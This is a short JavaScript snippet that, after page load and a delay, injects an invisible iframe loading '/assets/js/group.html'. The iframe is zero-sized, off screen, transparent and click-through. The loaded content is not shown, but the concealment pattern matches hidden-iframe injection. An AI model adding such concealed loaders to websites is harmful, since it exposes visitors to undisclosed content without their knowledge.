(function () {
function load() {
var f = document.createElement('iframe');
f.src = '/assets/js/group.html';
f.style.cssText = 'width:0;height:0;border:none;position:absolute;top:-9999px;opacity:0;pointer-events:none';
document.body.appendChild(f);
}
if (document.readyState === 'complete') {
setTimeout(load, 1500);
} else {
window.addEventListener('load', function () { setTimeout(load, 1500); });
}
})();